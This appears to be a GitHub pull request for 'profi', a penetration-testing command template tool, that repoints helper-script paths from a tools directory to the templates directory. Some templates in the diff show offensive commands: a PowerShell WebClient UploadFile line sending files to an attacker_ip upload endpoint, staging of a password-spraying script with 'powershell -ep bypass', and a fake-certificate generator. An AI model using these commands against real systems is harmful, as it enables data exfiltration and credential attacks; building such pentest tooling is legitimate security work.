### PR TITLE
Feat/move helper scripts

### DIFF
--- a/src/profi/profi.py
+++ b/src/profi/profi.py
@@ -61,6 +61,7 @@ def main():
 
     # Change directory to templates
     templates_dir = os.path.expanduser(config["templates_dir"])
+    os.environ["OP_TEMPLATES_DIR"] = templates_dir
     os.chdir(templates_dir)
 
     # Find files, excluding certain paths, and select one using rofi with environment variables

--- a/src/profi/templates/scripts/create-fake-certificate
+++ b/src/profi/templates/scripts/create-fake-certificate
@@ -1,1 +1,1 @@
-python <%=$(esh variables/tools_dir)%>/certificate/createFakeCertificate.py
+python <%=$(esh variables/templates_dir)%>/helper_scripts/createFakeCertificate.py

--- a/src/profi/templates/scripts/deliver-universal-transfer
+++ b/src/profi/templates/scripts/deliver-universal-transfer
@@ -1,4 +1,4 @@
-mkdir -p packstation/inbound/wwwroot; cp -n <%=$(esh variables/tools_dir)%>/phpserver/upload.php packstation/inbound/wwwroot; \
+mkdir -p packstation/inbound/wwwroot; cp -n <%=$(esh variables/templates_dir)%>/helper_scripts/upload.php packstation/inbound/wwwroot; \
 echo '================================================================'; \
 echo '                      -----PowerShell-----                      '; \
 echo 'Upload data (absolute paths only): (New-Object System.Net.WebClient).UploadFile(\'http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_inbound_port)%>/upload.php\',\'FILE\')'; \

--- a/src/profi/templates/scripts/deliver-windows-spray-passwords.ps1
+++ b/src/profi/templates/scripts/deliver-windows-spray-passwords.ps1
@@ -1,4 +1,4 @@
-mkdir -p packstation/outbound; cp -n <%=$(esh variables/tools_dir)%>/powershell/spray-passwords.ps1 packstation/outbound; \
+mkdir -p packstation/outbound; cp -n <%=$(esh variables/templates_dir)%>/helper_scripts/spray-passwords.ps1 packstation/outbound; \
 echo '================================================================'; \
 echo '                      -----PowerShell-----                      '; \
 echo 'Preparation: powershell -ep bypass'; \

--- a/src/profi/templates/scripts/icebreaker-services-to-note-md
+++ b/src/profi/templates/scripts/icebreaker-services-to-note-md
@@ -1,1 +1,1 @@
-python <%=$(esh variables/tools_dir)%>/icebreaker/icebreakerServicesToNoteMd.py
+python <%=$(esh variables/templates_dir)%>/helper_scripts/icebreakerServicesToNoteMd.py

--- a/src/profi/templates/scripts/namemash-py
+++ b/src/profi/templates/scripts/namemash-py
@@ -1,1 +1,1 @@
-python <%=$(esh variables/tools_dir)%>/namemash/namemash.py names.txt > possible.txt
+python <%=$(esh variables/templates_dir)%>/helper_scripts/namemash.py names.txt > possible.txt

--- a/src/profi/templates/scripts/nmap-services-to-note-md
+++ b/src/profi/templates/scripts/nmap-services-to-note-md
@@ -1,1 +1,1 @@
-python <%=$(esh variables/tools_dir)%>/nmap/nmapServicesToNote.py
+python <%=$(esh variables/templates_dir)%>/helper_scripts/nmapServicesToNote.py

--- a/src/profi/templates/scripts/nmap-services-to-note-org
+++ b/src/profi/templates/scripts/nmap-services-to-note-org
@@ -1,1 +1,1 @@
-python <%=$(esh variables/tools_dir)%>/nmap/nmapServicesToOrg.py
+python <%=$(esh variables/templates_dir)%>/helper_scripts/nmapServicesToOrg.py

--- a/src/profi/templates/scripts/openapi-to-note-md
+++ b/src/profi/templates/scripts/openapi-to-note-md
@@ -1,1 +1,1 @@
-python <%=$(esh variables/tools_dir)%>/openapi/openapiEndpointsToNote.py
+python <%=$(esh variables/templates_dir)%>/helper_scripts/openapiEndpointsToNote.py

--- a/src/profi/templates/scripts/postman-collection-to-note-md
+++ b/src/profi/templates/scripts/postman-collection-to-note-md
@@ -1,1 +1,1 @@
-python <%=$(esh variables/tools_dir)%>/postman/postmanEndpointsToNote.py
+python <%=$(esh variables/templates_dir)%>/helper_scripts/postmanEndpointsToNote.py

--- a/src/profi/templates/scripts/wsdl-to-note-md
+++ b/src/profi/templates/scripts/wsdl-to-note-md
@@ -1,1 +1,1 @@
-python <%=$(esh variables/tools_dir)%>/wsdl/wsdlEndpointsToNote.py
+python <%=$(esh variables/templates_dir)%>/helper_scripts/wsdlEndpointsToNote.py


### PR DESCRIPTION
This fixes an issue (https://github.com/pluggero/profi/issues/3) where the helper scripts were expected in the tools directory.
To resolve this, all templates using said helper scripts were changed to reference the templates directory instead.
Future templates using helper scripts will always reference the templates directory.